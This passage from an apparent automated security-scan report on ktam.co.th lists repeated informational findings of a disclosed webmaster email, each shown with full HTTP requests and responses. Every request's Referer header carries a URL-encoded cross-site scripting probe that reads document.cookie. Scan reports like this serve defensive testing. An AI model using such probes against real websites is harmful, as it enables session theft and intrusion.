Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29484

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.29. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/ads_csi300_2.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/ads_csi300_2.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:05 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29482

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.30. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news11.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news11.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.31. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news12.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news12.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:13 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.32. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news13.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news13.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:51 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.33. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news21.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news21.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:52 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.34. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news22.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news22.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:12 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_ktam_news23.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_ktam_news23.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:53 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29483

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.36. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav11.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav11.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:57 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.37. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav12.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav12.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:14 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.38. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav13.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav13.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.39. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav21.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav21.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.40. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav22.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav22.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:15 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.41. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/b_nav23.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/b_nav23.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:03 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29477

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.42. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_cr1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bg_cr1.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29476

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.43. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_head1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bg_head1.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:54 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29478

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.44. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu01.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bg_mmenu01.gif HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:25:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29480

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="mailto:webmaster@ktam.co.th">webmaster@ktam.co.th</a>
...[SNIP]...

26.45. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/bg_mmenu02.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /en/index.php/ims/bg_mmenu02.gif HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
